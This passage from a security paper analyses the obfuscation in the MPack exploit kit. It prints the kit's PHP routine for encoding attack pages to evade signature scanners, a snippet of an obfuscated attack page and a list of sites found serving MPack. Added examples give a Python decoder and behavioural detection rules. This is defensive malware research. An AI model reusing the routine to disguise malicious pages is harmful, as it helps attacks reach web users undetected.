OBFUSCATION

Obfuscation is a mechanism to hide attacks from static detection tools, which use signatures to match against a known malicious string. Obfuscation changes the appearance of the malicious string, thereby evading these detection tools. It is a technique we frequently encounter and one that both the IcePack and MPack tools support. With access to the MPack code, we are able to take a deeper look at how obfuscation is applied and whether there are weaknesses in the obfuscation routine.

Attack pages provided by MPack are obfuscated. The decryption routine executes three times before the attack page is in a state in which the browser can execute the contained attack code. A sample of the various obfuscation functions is shown in Figure 9, which leads to an obfuscated attack page as shown in Figure 10. It is obvious that a simple string matching algorithm would be unable to match on the attack code if this content changed upon every request.

00: function encrypt2($content)
01: {
02:  $table = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_@";
03:  $xor = 165;
04:  $table = array_keys(count_chars($table, 1));
05:  $i_min = min($table);
06:  $i_max = max($table);
07:  for ($c = count($table); $c > 0; $r = mt_rand(0, $c--))
08:  array_splice($table, $r, $c - $r, array_reverse(array_slice($table, $r, $c - $r)));
09:  $len = strlen($content);
10:  $word = $shift = 0;
11:  for ($i = 0; $i < $len; $i++)
12:  {$ch = $xor ^ ord($content[$i]);
13:   $word |= ($ch << $shift);
14:   $shift = ($shift + 2) % 6;
15:   $enc .= chr($table[$word & 0x3F]);
16:   $word >>= 6;
17:   if (!$shift) { $enc .= chr($table[$word]); $word >>= 6; }}
18:   if ($shift)
19:   $enc .= chr($table[$word]);
20:  $tbl = array_fill($i_min, $i_max - $i_min + 1, 0);
21:  while (list($k,$v) = each($table))
22:  $tbl[$v] = $k;
23:  $tbl = implode(",", $tbl);
24:  $fi = ",p=0,s=0,w=0, t=Array({$tbl} )";
25:  $f = "w|=(t[ x.charCodeAt(p++)-{$i_min}])<<s;";
26:  $f .= "if(s){r+=String.fromCharCode({$xor}^w&255);w>>=8;s-=2}else{s=6}";
27:  $r = "<script language=JavaScript>";
28:  $r.= "function dc(x){";
29:  $r.= "var l=x.length,i,j,r,b=(4096/4){$fi};";
30:  $r.= "for(j= Math.ceil(l/b);j>0;j--){r=''; for(i=Math.min(l,b);i>0;i--,l--){{$f}}document.write(r)}";
31:  $r.= "}dc(\"{$enc}\")";
32:  $r.= "</script>";
33:  $r2 = "document.write( unescape('%3C%73%63%72%69%70%74%3E%20%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28%73%29%0D
     %0A%7B%20%76%61%72%20%73%31%3D%20%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75%62%73%74%72%28%30%2C%20%73%2E%6C%65%6E
     %67%74%68%2D%31%29%29%3B%20%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68
     %3B%69%2B%2B%29%20%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%20%73%31%2E%63%68%61%72%43
     %6F%64%65%41%74%28%69%29%2D%20%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%20%31%29%29%3B%20%0D%0A
     %64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D%0D%0A%3C%2F%73%63%72%69
     %70%74%3E')); zX('".encodezTxt($content)."');";
34:  $r2 = "<Script Language='JavaScript'>".$r2."</Script>"; // [\\'\">]
35:  $r2 = "<script language=javascript>document.write(unescape(\"" .escape($r2). "\"))</script>";
36:  return $r2;
37: }

Figure 8 - MPack Obfuscation Routine

However, MPack v0.94 currently contains a major bug in its obfuscation routine: it produces unchanged obfuscated output for the same attack page (the bug is located on line 3 of Figure 9: instead of 165, the XOR key should be a random number). Even if the bug is fixed, there seems to be a finite number of obfuscated pages the current version of MPack could generate, and therefore static matching on the attack page does fall into the realm of possibility. Alternatively, several efforts attempt to decrypt obfuscated JavaScript and statically analyze the code in the clear [15], [16], or analyze the code's behavior within a JavaScript engine [17].

<script language=javascript>document.write(unescape("%3CScript%20Language%3D%27JavaScript%27%3Edocument.write%28
%20unescape%28%27%253C%2573%2563%2572%2569%2570%2574%253E%2520%250D%250A%2566%2575%256E%2563%2574%2569%256F%256E
%2520%257A%2558%2528%2573%2529%250D%250A%257B%2520%2576%2561%2572%2520%2573%2531%253D%2520%2575%256E%2565%2573
%2563%2561%2570%2565%2528%2520%2573%252E%2573%2575%2562%2573%2574%2572%2528%2530%252C%2520%2573%252E%256C%2565
%256E%2567%2574%2568%252D%2531%2529%2529%253B%2520%2520%2576%2561%2572%2520%

...

%252A5I%252A5F%252A5I%252A5F%252A8H%252A7Kxhwnuy%252A8J%252A5I%252A5F%252A8H%252A7Kmjfi%252A8J%252A5I%252A5F%252A8H
gti%257E%252A75tsqtfi%252A8I%252A77xyfwy%252A7%253D%252A7%253E%252A77%252A8J%252A5I%252A5F%252A8Hin%257B%252A75ni
%252A8I%252A77r%257Ein%257B%252A77%252A8J%252A8H%252A7Kin%257B%252A8J%252A5I%252A5F%252A8H%252A7Kgti%257E%252A8J
%252A5I%252A5F%252A8H%252A7Kmyrq%252A8J%252A5I%252A5F%252A8Hnkwfrj%252A75%257Cniym%252A8I6%252A75mjnlmy%252A8I6
%252A75gtwijw%252A8I5%252A75kwfrjgtwijw%252A8I5%252A75xwh%252A8I%252A77myyu%252A8F%252A7K%252A7Kfqqmnlm2inxfgqji3twl
%252A7Khtzsyjw%252A7Knsij%257D3umu%252A77%252A8J%252A8H%252A7Knkwfrj%252A8J5%27%29%3B%3C/Script%3E"))</script>

Figure 9 - Obfuscated Attack Page (Snippet)
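The following Python decoder is an added example, not code from MPack or from this paper: it mirrors the two client-side decoding functions the routine in Figure 8 emits, dc() (the 6-bit LSB-first packing with the XOR key, lines 24-31) and zX() (the shift-by-last-digit wrapper hidden in the unescape string on line 33), so a captured page can be decoded offline. The function names and the latin-1 handling of unescape are my assumptions; the dc sample is constructed, while the zX sample is the fragment ending in "xhwnuy" from Figure 9 with the outer unescape level removed.

```python
from urllib.parse import unquote

# Character set from line 02 of the routine; the live table is a shuffle of these codes.
TABLE_CHARS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_@"


def js_unescape(s: str) -> str:
    # JavaScript unescape() turns each %XX into one byte-valued character, so decode as
    # latin-1 to keep that 1:1 mapping (assumption: no %uXXXX sequences in these samples).
    return unquote(s, encoding="latin-1")


def build_t(table_codes):
    """Mirror lines 20-23: turn the table (index -> char code) into `t` (code -> index)."""
    i_min = min(table_codes)
    t = [0] * (max(table_codes) - i_min + 1)
    for index, code in enumerate(table_codes):
        t[code - i_min] = index
    return t, i_min


def decode_dc(enc: str, t, i_min: int, xor: int) -> str:
    """Mirror the emitted dc(): 6-bit symbols packed LSB-first, four symbols per three bytes.
    `t`, `i_min` and `xor` are read off the captured page; the paper notes xor is fixed at
    165 in v0.94, so that one key decodes every page that version produced."""
    out, w, s = [], 0, 0
    for ch in enc:
        w |= t[ord(ch) - i_min] << s
        if s:
            out.append(chr(xor ^ (w & 255)))
            w >>= 8
            s -= 2
        else:
            s = 6
    return "".join(out)


def decode_zx(arg: str) -> str:
    """Mirror zX(): the last char is the shift digit n; the rest is unescaped, every char
    is shifted down by n, and the result is unescaped again."""
    shift = int(arg[-1])
    shifted = js_unescape(arg[:-1])
    return js_unescape("".join(chr(ord(c) - shift) for c in shifted))


def demo():
    # Constructed dc sample: "Hi!" encoded with the unshuffled table and the fixed key 165.
    t, i_min = build_t(sorted(ord(c) for c in TABLE_CHARS))
    # zX sample from Figure 9 (outer unescape removed) plus the snippet's trailing digit 5.
    return decode_dc("hnBW", t, i_min, 165), decode_zx("%2A8H%2A7Kxhwnuy%2A8J5")
```

Because the table shuffle, i_min and the key are all present in clear text inside the emitted dc() function, an analyst can recover them from the page itself; nothing secret protects the payload.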

On top of this obfuscation, however, additional obfuscation is likely to be applied to the front-end page that imports the attack page from the exploit server. These front-end pages do not merely place a static iframe on the page that imports the exploit. Rather, obfuscated JavaScript snippets append the iframe (via the document.write method) to the page once it is opened. Since this technique is independent of the web exploitation kit, it might even have been applied with the earlier web exploitation kits that did not support obfuscation.

In addition, there are other means to determine whether a web exploitation kit is involved in an attack. A successful attack by a particular web exploitation kit seems to cause similar state changes on the client machine (see Appendix A for a complete list of state changes encountered on the URL http://www.keithjarrett.it, which was attacked by an MPack server). As such, by simply reviewing the state changes caused on the client, one is able to infer which web exploitation kit was used in the attack. For example, reviewing the MPack attack page we observe that a file with the name “sys” plus four random characters and “.exe” is always pushed to C:\. Matching on this behavioral signature of this specific file write event among the state changes yields an identification of MPack attacks. From the 306 malicious URLs we identified in our KYE study, we were able to identify 13 URLs (or 4.24%) that utilized MPack using these behavioral signatures:

URL
http://www.sexyclips.org/media.php?clip=one_night_in_paris_spoof.html
http://mashathumbs.com/
http://www.forumsplace.com/page_not_found.php
http://www.keithjarrett.it/
http://www.aerosmith.com/
http://www.versiontwo.org/old/archives/2003/05/jessica_lynch_r.html
http://www.spacefellowship.com/News/?p=1824
http://www.globalwarmingbar.com/
http://www.dalekeiger.com/?p=133
http://77kelvin.a55.nthosting.ru/
http://www.PoochTV.com
http://www.forumwz.org/archive/index.php/f-14.html
http://www.cracks.vg/cracks/The_Sims_2_Virtual_Disk_111912.html

Table 3 - MPack URLs

We also discovered a static iframe as part of the attack page in MPack that attempted to import an additional page “/counter/index.php” from the remote web server “allhigh.org”. If this was indeed included by the creators of MPack, its purpose might be to count the number of times their framework is used or to potentially steal a customer for themselves. The path name indicates that it is used for counting, but because the URL is no longer live we cannot confirm either explanation. Either way, if such static iframes are used, identification of a web exploitation kit would be straightforward: simply monitor DNS lookups for the specific host name. If a DNS lookup of allhigh.org is observed, that would be the indicator that a client attack by the MPack web exploitation kit was attempted.
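As an added example (not from the paper), the two behavioral indicators described above, the “sys” + four characters + “.exe” file write in C:\ and a DNS lookup of allhigh.org, applied to constructed client-honeypot state-change records. The record format, the rule names and the assumption that the four random characters are alphanumeric are mine.

```python
import re
from dataclasses import dataclass

# Assumption: the four random characters are alphanumeric; the paper only says "random".
# The pattern is anchored at the drive root because the paper observed the write in C:\.
MPACK_DROPPER = re.compile(r"^C:\\sys[A-Za-z0-9]{4}\.exe$", re.IGNORECASE)
MPACK_COUNTER_HOST = "allhigh.org"


@dataclass(frozen=True)
class StateChange:
    kind: str    # "file" or "dns" in this constructed record format
    action: str  # e.g. "write" or "lookup"
    target: str  # file path or host name


def parse_record(line: str) -> StateChange:
    # Constructed record format: kind|action|target, one record per line.
    kind, action, target = line.rstrip("\n").split("|", 2)
    return StateChange(kind.strip(), action.strip(), target.strip())


def match_mpack(changes) -> list:
    """Return the names of the MPack indicators that fire; an empty list means no evidence."""
    hits = set()
    for c in changes:
        if c.kind == "file" and c.action == "write" and MPACK_DROPPER.match(c.target):
            hits.add("mpack-dropper-filename")
        elif c.kind == "dns" and c.action == "lookup" and c.target.lower().rstrip(".") == MPACK_COUNTER_HOST:
            hits.add("mpack-counter-iframe-dns")
    return sorted(hits)


# Constructed state-change records; only two of them should match.
SAMPLE_LOG = """\
file|write|C:\\Documents and Settings\\user\\Local Settings\\Temp\\~DF1234.tmp
dns|lookup|www.keithjarrett.it
dns|lookup|allhigh.org
file|write|C:\\sysk7q2.exe
file|write|C:\\WINDOWS\\system32\\drivers\\etc\\hosts
"""


def scan(log_text: str) -> list:
    return match_mpack(parse_record(l) for l in log_text.splitlines() if l.strip())
```

The file-name rule attributes the kit even when the obfuscated page itself is unreadable, while the DNS rule only helps as long as the kit keeps the static counter iframe.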